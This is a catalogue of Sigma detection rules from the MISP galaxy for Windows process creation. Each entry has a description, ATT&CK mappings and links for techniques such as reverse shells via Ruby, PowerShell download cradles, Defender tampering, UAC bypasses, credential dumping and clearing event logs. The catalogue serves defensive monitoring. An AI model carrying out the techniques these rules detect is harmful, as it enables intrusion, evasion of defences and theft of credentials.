Detects execution of javascript code using "mshta.exe".

The tag is: misp-galaxy:sigma-rules="Suspicious JavaScript Execution Via Mshta.EXE"

Suspicious JavaScript Execution Via Mshta.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 10866. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml

Ruby Inline Command Execution

Detects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live ruby code.

The tag is: misp-galaxy:sigma-rules="Ruby Inline Command Execution"

Ruby Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10867. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml

Potential RDP Tunneling Via Plink

Execution of plink to perform data exfiltration and tunneling

The tag is: misp-galaxy:sigma-rules="Potential RDP Tunneling Via Plink"

Potential RDP Tunneling Via Plink has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10868. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml

Potential Persistence Via Logon Scripts - CommandLine

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Logon Scripts - CommandLine"

Potential Persistence Via Logon Scripts - CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 10869. Table References

Links

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_logon_script.yml

Delete Important Scheduled Task

Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Delete Important Scheduled Task"

Delete Important Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10870. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete.yml

Obfuscated IP Download Activity

Detects use of an encoded/obfuscated version of an IP address (hex, octal, ...) in a URL combined with a download command

The tag is: misp-galaxy:sigma-rules="Obfuscated IP Download Activity"

Table 10871. Table References

Links

https://twitter.com/Yasser_Elsnbary/status/1553804135354564608

https://twitter.com/fr0s7_/status/1712780207105404948

https://h.43z.one/ipconverter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE"

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10872. Table References

Links

https://redcanary.com/threat-detection-report/threats/qbot/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml

Interesting Service Enumeration Via Sc.EXE

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

The tag is: misp-galaxy:sigma-rules="Interesting Service Enumeration Via Sc.EXE"

Interesting Service Enumeration Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10873. Table References

Links

https://pentestlab.blog/tag/svchost/

https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE

Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Defender Registry Key Tampering Via Reg.EXE"

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10874. Table References

Links

https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/

https://github.com/swagkarna/Defeat-Defender-V1.2.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml

Wusa Extracting Cab Files

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab files using the "/extract" argument, which is no longer supported. This could indicate an attacker using an old technique

The tag is: misp-galaxy:sigma-rules="Wusa Extracting Cab Files"

Table 10876. Table References

Links

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction.yml

Suspicious Process Created Via Wmic.EXE

Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Created Via Wmic.EXE"

Suspicious Process Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10877. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://thedfirreport.com/2020/10/08/ryuks-return/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml

Suspicious Process Execution From Fake Recycle.Bin Folder

Detects process execution from a fake recycle bin folder, often used to evade security solutions.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Execution From Fake Recycle.Bin Folder"

Table 10878. Table References

Links

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml

Suspicious HH.EXE Execution

Detects a suspicious execution of Microsoft HTML Help (HH.exe)

The tag is: misp-galaxy:sigma-rules="Suspicious HH.EXE Execution"

Suspicious HH.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10879. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml

Webshell Tool Reconnaissance Activity

Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands

The tag is: misp-galaxy:sigma-rules="Webshell Tool Reconnaissance Activity"

Webshell Tool Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10880. Table References

Links

https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml

Computer Password Change Via Ksetup.EXE

Detects password change for the computer’s domain account or host principal via "ksetup.exe"

The tag is: misp-galaxy:sigma-rules="Computer Password Change Via Ksetup.EXE"

Table 10881. Table References

Links

https://twitter.com/Oddvarmoe/status/1641712700605513729

https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml

Suspicious Eventlog Clear or Configuration Change

Detects clearing or configuration of event logs using wevtutil, powershell and wmic. Might be used by ransomware during an attack (seen with NotPetya and others).

The tag is: misp-galaxy:sigma-rules="Suspicious Eventlog Clear or Configuration Change"

Suspicious Eventlog Clear or Configuration Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10882. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html

https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/

https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml

Suspicious Certreq Command to Download

Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files

The tag is: misp-galaxy:sigma-rules="Suspicious Certreq Command to Download"

Suspicious Certreq Command to Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10883. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certreq/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml

Renamed BrowserCore.EXE Execution

Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)

The tag is: misp-galaxy:sigma-rules="Renamed BrowserCore.EXE Execution"

Renamed BrowserCore.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10884. Table References

Links

https://twitter.com/mariuszbit/status/1531631015139102720

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

The tag is: misp-galaxy:sigma-rules="Potential Script Proxy Execution Via CL_Mutexverifiers.ps1"

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10885. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml

HackTool - Default PowerSploit/Empire Scheduled Task Creation

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

The tag is: misp-galaxy:sigma-rules="HackTool - Default PowerSploit/Empire Scheduled Task Creation"

HackTool - Default PowerSploit/Empire Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10886. Table References

Links

https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml

Tor Client/Browser Execution

Detects the use of Tor or Tor-Browser to connect to onion routing networks

The tag is: misp-galaxy:sigma-rules="Tor Client/Browser Execution"

Tor Client/Browser Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 10887. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml

PUA - Seatbelt Execution

Detects the execution of the PUA/Recon tool Seatbelt via PE information or command line parameters

The tag is: misp-galaxy:sigma-rules="PUA - Seatbelt Execution"

PUA - Seatbelt Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 10888. Table References

Links

https://github.com/GhostPack/Seatbelt

https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml

HackTool - Inveigh Execution

Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

The tag is: misp-galaxy:sigma-rules="HackTool - Inveigh Execution"

HackTool - Inveigh Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10889. Table References

Links

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://github.com/Kevin-Robertson/Inveigh

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml

UAC Bypass Abusing Winsat Path Parsing - Process

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - Process"

UAC Bypass Abusing Winsat Path Parsing - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10890. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml

Potentially Suspicious Child Process Of Regsvr32

Detects potentially suspicious child processes of "regsvr32.exe".

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of Regsvr32"

Potentially Suspicious Child Process Of Regsvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10891. Table References

Links

https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo

https://www.echotrail.io/insights/search/regsvr32.exe

https://redcanary.com/blog/intelligence-insights-april-2022/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml

Webshell Detection With Command Line Keywords

Detects certain command line parameters often used during reconnaissance activity via web shells

The tag is: misp-galaxy:sigma-rules="Webshell Detection With Command Line Keywords"

Webshell Detection With Command Line Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10892. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml

Suspicious Execution of Shutdown to Log Out

Detects the rare use of the command line tool shutdown to log off a user

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Shutdown to Log Out"

Suspicious Execution of Shutdown to Log Out has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 10894. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml

Unmount Share Via Net.EXE

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

The tag is: misp-galaxy:sigma-rules="Unmount Share Via Net.EXE"

Unmount Share Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 10895. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_share_unmount.yml

Add Insecure Download Source To Winget

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

The tag is: misp-galaxy:sigma-rules="Add Insecure Download Source To Winget"

Add Insecure Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10896. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml

Launch-VsDevShell.PS1 Proxy Execution

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

The tag is: misp-galaxy:sigma-rules="Launch-VsDevShell.PS1 Proxy Execution"

Launch-VsDevShell.PS1 Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"

Table 10897. Table References

Links

https://twitter.com/nas_bench/status/1535981653239255040

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml

Interactive AT Job

Detects an interactive AT job, which may be used as a form of privilege escalation.

The tag is: misp-galaxy:sigma-rules="Interactive AT Job"

Interactive AT Job has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 10898. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md

https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml

Suspicious Download From File-Sharing Website Via Bitsadmin

Detects usage of bitsadmin downloading a file from a suspicious domain

The tag is: misp-galaxy:sigma-rules="Suspicious Download From File-Sharing Website Via Bitsadmin"

Suspicious Download From File-Sharing Website Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10899. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://isc.sans.edu/diary/22264

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml

Sdiagnhost Calling Suspicious Child Process

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

The tag is: misp-galaxy:sigma-rules="Sdiagnhost Calling Suspicious Child Process"

Sdiagnhost Calling Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10900. Table References

Links

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/

https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml

Suspicious Child Process of AspNetCompiler

Detects potentially suspicious child processes of "aspnet_compiler.exe".

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process of AspNetCompiler"

Suspicious Child Process of AspNetCompiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10901. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

The tag is: misp-galaxy:sigma-rules="Microsoft IIS Service Account Password Dumped"

Microsoft IIS Service Account Password Dumped has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10902. Table References

Links

https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html

https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA

https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml

System File Execution Location Anomaly

Detects a Windows program executable started from a suspicious folder

The tag is: misp-galaxy:sigma-rules="System File Execution Location Anomaly"

System File Execution Location Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10903. Table References

Links

https://twitter.com/GelosSnake/status/934900723426439170

https://asec.ahnlab.com/en/39828/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml

PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

The tag is: misp-galaxy:sigma-rules="PowerShell Download and Execution Cradles"

PowerShell Download and Execution Cradles has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10904. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml

Arbitrary File Download Via GfxDownloadWrapper.EXE

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file.

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via GfxDownloadWrapper.EXE"

Arbitrary File Download Via GfxDownloadWrapper.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10905. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml

UAC Bypass Using MSConfig Token Modification - Process

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using MSConfig Token Modification - Process"

UAC Bypass Using MSConfig Token Modification - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10906. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml

Service Reconnaissance Via Wmic.EXE

An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information will be displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable

The tag is: misp-galaxy:sigma-rules="Service Reconnaissance Via Wmic.EXE"

Service Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10907. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml

Sysmon Configuration Update

Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Update"

Sysmon Configuration Update has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10908. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml

Script Interpreter Execution From Suspicious Folder

Detects a suspicious script execution in temporary folders or folders accessible by environment variables

The tag is: misp-galaxy:sigma-rules="Script Interpreter Execution From Suspicious Folder"

Script Interpreter Execution From Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10909. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/shell/csidl

https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f

